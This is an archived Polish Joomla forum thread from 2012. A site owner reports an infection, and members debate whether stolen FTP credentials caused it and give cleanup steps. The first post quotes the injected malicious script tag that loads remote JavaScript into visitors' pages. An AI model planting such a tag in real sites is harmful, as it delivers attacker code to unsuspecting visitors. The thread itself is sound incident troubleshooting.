PDA

Zobacz pełną wersję : Złośliwy kod Joomla 2.5.3 -Atak na Joomla!



bosopopiasq
21-03-2012, 09:07
Dziś ledwo ledwo weszłam na stroną,nie wiedziałam co sie stało,muliło,kręciło zauważyłam że następuje ciągłe dziwne łączenie ze stroną organicfoodmarekts,myślałam ze to coś z reklamami,ale nie mam takich więc
zajrzałam w żródło strony a tam "Szok"


<script type="text/javascript" src="http://organicfoodmarkets.com.au/release.js (http://forum.joomla.pl/view-source:http://organicfoodmarkets.com.au/release.js)">
</script><!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Transitional//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-transitional.dtd"> <html xmlns="http://www.w3.org/1999/xhtml" xml:lang="pl-pl" lang="pl-pl" dir="ltr" > <head> <meta http-equiv="content-type" content="text/html; charset=utf-8" />
Oczywiście zaraz wysłałam nowka pliki Joomla i problem znikł
Także "Nasza Joomla 2.5.3 "Jest podatna na ataki

nikszal
21-03-2012, 09:12
Przejrzyj logi serwera i sprawdź przez co weszli. To jest ważna informacja dla wszystkich.

bosopopiasq
21-03-2012, 09:25
Wiem i napisałam do Administratora hostingu-Dam znać!

---------- Post dodany o 08:25 ---------- Poprzedni post był o 08:15 ----------

Dodam,że trzeba nadpisać wszystkie pliki włącznie z modułami,komponentami jak fora,księgi itp,pluginami
Jesli ma sie sporo doinstalowanych dodatków to..też są zarażone!

nikszal
21-03-2012, 09:29
Może zainstalowałaś coś pochodzącego z szemranego źródła, albo wersję w fazie rozwoju (alfa, beta...)?

bosopopiasq
21-03-2012, 09:39
nie mam zadnych komponentów,modułow,pluginów, tylko wczoraj doinstalowałam najnowsze forum Kunena
Moja Joomla to
Joomla czyściutka i forum Kunena
Wszystko było zarażone,nawet wejście do adresstrony/administrator

---------- Post dodany o 08:39 ---------- Poprzedni post był o 08:38 ----------

domyśliłam sie co trzeba zaktualizować po tym jak i kunena została zarażona

PeFik
21-03-2012, 11:07
1) a login i hasło jaki miałaś, niech zgadnę "admin" / admin1 / kotek ?
2) czy ustawiłaś .hhtaceesa (czyli przemianowałaś z z .txt) to bardzo ważne!! bo tam są reguły bezpieczeństwa !!

Kurcze jak widzisz ... nawet najlepsze drzwi można otworzyć, takie życie.

bosopopiasq
21-03-2012, 11:53
hasło jest kilkunasto cyfrowe i zawiera litery w tym duże i małe
do serwera jest inne
poczta inne
Obecnie zmienione wszystkie(hasła zmieniam zawsze co jakiś czas-taki mam nawyk od lat)
To ze jestem baba nie znaczy ze używam hasła beybe a loginu love :P
.htaccess- kolego jest przemianowany,skonfigurowany.
Joomla używam od kilkuuuuu lat,zaczynałam od Mamboo :)

palyga007
21-03-2012, 12:26
Czy coś jest podatne na ataki czy nie będzie można dopiero stwierdzić, po odkryciu skąd przyszedł atak. Równie dobrze infekcja mogła pochodzić z Twojego komputera i zostać przeniesiona poprzez FTP.

ramiro
21-03-2012, 12:30
Jakie miałeś ID Administratora?

bosopopiasq
21-03-2012, 14:00
Czy coś jest podatne na ataki czy nie będzie można dopiero stwierdzić, po odkryciu skąd przyszedł atak. Równie dobrze infekcja mogła pochodzić z Twojego komputera i zostać przeniesiona poprzez FTP.
Nie mogła,bo nic nie wysylałam na serwer przez ostatni tydzień,ściągłam jedynie forum kunena,ale pliki są skanowane przy pobieraniu to raz,zanim wypakuje to robie to również.Zauważyłam w sieci po wpisaniu tego kodu tzn adresu tej strony,ze jest kilka stron o podobnym zarażaniu.
Czekam na info od admina hostingu,odpisał owszem,ale zebym pozmieniała hasło hm..czyżby hosting joi.pl był ...podatny?

---------- Post dodany o 13:00 ---------- Poprzedni post był o 12:58 ----------


Jakie miałeś ID Administratora?
miałaś..jestem miałaś :P
jest okay było zmienione po instalacji XXXL czasu temu

neo_fox
21-03-2012, 14:09
Także "Nasza Joomla 2.5.3 "Jest podatna na ataki

To raczej nie ma wiele wspólnego z Joomla!.
Poszukaj trochę na Google to zobaczysz że tym kodem zainfekowane są wszelkiego rodzaju skrypty, SMF, Drupal, Wordpress a nawet zwykłe statyczne strony HTML.
Co raczej wskazuje na to że kod jest dodawany przez FTP.

bosopopiasq
21-03-2012, 16:03
Oznacza to ze kod atakuje wszystko co jest podatne na ataki, skoro zaatakował Joomla w tej wersji to oznacza ze ma ona słabą kłódkę... to logiczne
Szukałam w Google, jak już wspomniałam, jak i to kiedy cokolwiek wysyłałam przez ftp (mam Fillezilla), chyba ze dostało sie podczas instalacji forum kunena wczoraj i tylko ona była instalowana
Komputer mam czyściutki jak łza, przeskanowałam go sobie z nudów 2 niezależnymi Antywirusami.

Czas pokaże...jak na razie admin z hostingu nic nie odpisuje, a ja na logach sie nie znam
(NIGDY nie mialam potrzeby wnikać w nie i stąd nie wiem jak to sie je)
Kunena nie skanowałam a szkoda bo jak załapałam co instalowałam ostatnio zrobiłam Jej DELETE Steganosem
czyżby w jej pliku coś siedziało?

neo_fox
21-03-2012, 16:18
Oznacza to ze kod atakuje wszystko co jest podatne na ataki

No to mi proszę wyjaśnij w jaki konkretnie sposób statyczna strona napisana w czystym kodzie HTML jest podatna na ataki umożliwiające nadpisanie plików na serwerze?
Pomijając fakt że praktycznie nie zdarza się aby ten sam exploit był stosowany w wielu niezależnych od siebie skryptów

bosopopiasq
21-03-2012, 23:42
No to moze Ty mi wyjaśnij w jaki sposób to coś wlazło na Joomla,skoro tylko instalowałam kunena.
a Galeria Coopermine jako subdomena jest od lat czyściutka
dopóki miałam J.1.6 wszystko było okay. Mam Wordpressa z forum SMF z ponad 700 set użytkownikami i też jest czyściutkie
Zaktualizowałam sobie Joomla, bo mi nie potrzebne komercyjnme dodatki i jakiekolwiek inne świecidełka, zainstalowałam forum kunena i rankiem dziś gość w kodach. Fakt zarejestrował sie wczoraj jakiś user z adresem email należacym do SPAMU, ale nigdy konta nie aktywował, bo maila nie odebrał ..hm..

neo_fox
22-03-2012, 00:02
wyjaśnij w jaki sposób to coś wlazło na Joomla

Przecież pisałem i pisali Ci też inni. Najprawdopodobniej ktoś się włamał przez FTP.
Albo ponieważ ktoś złamał hasło, sama częsta zmiana hasła nic nie daje jeśli hasło jest proste do wykrycia (np: rzeczywiste słowa czy nawet zdania) albo przez trojana na Twoim komputerze.


dopuki miałam J.1.6 wszystko było okay.Mam Wordpressa z forum SMF z ponad 700 set użytkownikami i też jest czyściutkie

Twoje argumenty są, wybacz mi ale śmieszne: tak samo mógłbym Ci napisać że korzystam z Joomla! od czasów Mambo 4 i mamy około piętnastu różnych stron opartych na różnych wersjach Joomla!. Na dodatek SMF z około 25 tysiącami użytkowników i nigdy takich problemów nie miałem.
Poza tym dziury które zostały załatane w Joomla! 2.5.3 nadal są w Joomla! 1.6 także na sto procent Joomla! 2.5.3 jest znacznie bezpieczniejsza niż Joomla! 1.6 czy 1.7

Nie twierdzę że Joomla! jest perfekcyjna ale skoro widać wyraźnie że ten sam exploit jest na wielu stronach internetowych niezależnie od wykorzystywanego oprogramowania to wniosek jest w miarę oczywisty.

Jeśli na przykład nagle różnej marki samochody zaczną się z jakiegoś powodu psuć to najmniej prawdopodobnym powodem usterki jest marka tego samochodu a raczej coś co te samochody ze sobą mają wspólnego. Przykładowo benzyna z tej samej stacji czy wykorzystywany w nich olej.

cherokee
22-03-2012, 14:10
[...ciach...]

Przerabiałem to... Być może podsunę Wam jakieś rozwiązanie, ponieważ zauważyłem skuteczną likwidację problemu.

1. Zacznij od przeskanowania swojego komputera dobrym programem antywirusowym (dogłębne skanowanie). Wirusy, które pewnie znajdziesz to:
Sirefef.X (gdzie X to inne odmiany z końcówką nazwy) - umożliwia wykonywanie poleceń wydawanych Twojemu komputerowi przez hackera.


Oraz wirus: Karagany.X (gdzie X to inne odmiany z końcówką nazwy) - umożliwia przechwytywanie haseł które wpisujesz w komputerze.

Prawdopodobne również: Opachki, Ransom - Oba wykonują polecenia osoby atakującej.


2. Po skanowaniu zmień wszystkie hasła we wszystkich programach których używasz do FTP, w tym oczywiście na kontach FTP. Warto używać niepopularnego oprogramowania FTP (Total Commander jest podatny na wykradanie haseł)

3. Nadpisz wszystkie zainfekowane pliki na serwerze (upierdliwe ale da się zrobić)

4. Zablokuj dostęp wykrytych IP (znajdziesz je w logach FTP i nie będzie to twoje IP, zablokuj dostęp IP w .ftpaccess - przeczytaj -> http://www.proftpd.org/localsite/Userguide/linked/x1021.html). Nie trzeba być ekspertem by znaleźć momenty gdy Twoje pliki są nadpisywane. Zwykle najpierw następuje pobranie pliku, później jego nadpisanie z dodanym kodem.

5. Zablokuj dostęp wykrytych IP .htaccess
Oczywiście blokowanie niewiele może dać bo zmienić IP łatwo.


6. Możesz ponownie zmienić hasła FTP i ponownie przeskanować komputer antywirusem.

7. Nie zapisuj haseł w TC i w plikach o banalnych nazawach: hasla.txt, pass.txt itp. Zapisz (jeżeli już musisz np w ciastoczekoladowe.!to - :))

8. Pamiętaj o prawach dostępu do plików i katalogów na serwerze... prawa 777 i 666 to niedobry pomysł... choć łanie wyglądają.

9. Dla pewności zainstaluj sobie program do monitorowania ruchu twojego komputera z siecią... szybko zauważysz że coś z komputera "wycieka". Stosuj też bieżący monitoring plików w twoim kompie.. (sporo dobrego oprogramowania możesz znaleźć za free).


No i tyle.

Pozdrawiam.

neo_fox
22-03-2012, 14:13
Total Commander jest podatny na wykradanie haseł

Skąd taki wniosek?

cherokee
22-03-2012, 14:17
Skąd taki wniosek?

Z analizy..

neo_fox
22-03-2012, 14:42
Z analizy..

Z analizy czego?
Total Commander jest tak samo, albo nawet bardziej, bezpieczny jak większość klientów FTP.

Podatny na wykradanie haseł jest sam protokół FTP ponieważ przesyła hasło i nazwę użytkownika w sposób niezakodowany.
Co oznacza że każdy program na Twoim komputerze i, co najważniejsze, każdy komputer znajdujący się w tej samej sieci, może te dane przchwycić.

Dlatego staram się FTP nie używać.

cherokee
22-03-2012, 15:00
Z analizy czego?[...ciach...]

Szanowny neo_fox

Nie mam oczywiście zamiaru dyskutować na temat wyższości tego czy innego oprogramowania na tym albo tamtym. Nie będę się też uzewnętrzniał na tematy związane z TC, każdy używa oprogramowania takiego jakie uzna za stosowne.

Podałem skuteczny, choć pewnie nie we wszystkich przypadkach, sposób na poradzenie sobie z "dziwnymi" podmianami plików na serwerach przy pomocy protokołu FTP.

Oczywiście nie mam też zamiaru analizować samego protokołu FTP i rozważać tutaj tego na co on podatny a na co nie, bo to chyba nie ten temat, nie to forum...

Pozdrawiam i z mojej strony EOT.

neo_fox
22-03-2012, 15:18
rozważać tutaj tego na co on podatny a na co nie, bo to chyba nie ten temat,

W gruncie rzeczy jak najbardziej na temat ponieważ dokładnie z tego względu że ludzie sobie nie zdają sprawy jak bardzo FTP jest podatne na przechwycenie danych wynika bardzo wiele problemów.
Ludzie łączą się przez FTP z kawiarni internetowych, uczelni, w hotelach czy przy korzystaniu z hotspotów i w tym momencie każdy kto znajduje się w tej samej sieci może te dane bezproblemowo uzyskać. A potem jest płacz i zgrzytanie zębami jaka to Joomla! niedobra.

I tu w niczym nie zmienia faktu że TC słabo koduje zapisane hasła a FileZilla nawet przechowuje je w otwartym tekście bo większość haseł jest przechwytywanych zupełnie innym sposobem.

PeFik
22-03-2012, 23:43
... na koniec sugeruje kupić, a dokładniej zainwestować w komponent do ochrony strony, skoro jesteś fanem J! od tylu lat, to powinnaś to wiedzieć.

wtedy on sam ci napisze e-maila, ktos ci się włamał, a jeśli nie napiszę , a ty znajdziesz zmiany = ktoś ma dostęp z poziomu FTP

cherokee
23-03-2012, 10:35
Jeszcze mi się przypomniało...

Sprawdź na swoim koncie czy nie masz tam gdzieś wgranych plików (nie przez Ciebie):

counter.php,
include_footer.php,
footer_include.php,
ping.php

w trzech pierwszych znajdziesz kod wirusa, oczywiście zakładając że włam nastąpił właśnie w ten sposób (przez FTP).

PeFik
23-03-2012, 13:41
a także plik footer.php oraz index.php - w szablonach wszystkich!

zwiastun
23-03-2012, 16:16
Ja tam dyskutować nie będę. Odnalezienie wszystkich zmienionych plików trudne nie jest. Tylko czy to jest metoda? Wystarczy, że jeden zostanie pominięty, aby kontrola nad witryną nadal była w rękach napastnika.
Ja tam wolę sprawdzone przeinstalowanie wszystkiego od 0!

cherokee
27-03-2012, 09:47
[...ciach...] Wystarczy, że jeden zostanie pominięty, aby kontrola nad witryną nadal była w rękach napastnika.
Ja tam wolę sprawdzone przeinstalowanie wszystkiego od 0!

Wystarczy znaleźć te które są zakażone, później wyszukać pliki na zawartość danego kodu, który w nich znajdziemy - znajdzie wszystkie. Oczywiście nadpisanie wszystkich plików z całej instalacji jest najlepszym wyjściem, choć... jeżeli są dograne pliki które nie należą do instalacji, to po nadpisaniu i tak zostaną... dlatego uważam że skanowanie plików na zawartość danej np. frazy - jest najlepszym rozwiązaniem.

Już miałem nie pisać w tym temacie mimo, że chwilę po moim ostatnim poście przypomniało mi się aby prócz sprawdzenia czy nie zostały wgrane w system pliki które do niego nie należą, sprawdzić przede wszystkim:

wszystkie pliki: index.html, index.php, default.php, footer.php, wszystkie pliki ze stronami błędów 404, 403 itp.

netsoft_sg
04-12-2012, 14:07
a co powiecie, na fakt , że ja od lat mam wyłaczony serwer ftp i dostep jest tylko po ssh do serwerka
a plis js ciągel są infekowane ?

i jak w logach sprawdzic ze dane ip infekuje pliki ?

netsoft_sg
04-12-2012, 18:48
przepraszam bład w pisowni w poprzedniej wiadomości: oczywiście infekwoane sa pliki *.js

w logach mam np:
78.10.59.34 - - [08/Nov/2012:21:44:13 +0100] "GET /szkolenia3/lib/dropdown.js HTTP/1.1" 200 2551
ale nie ma nigdzie "PUT"
czyli przegladaja sobie strony ale nie wgrywaja ?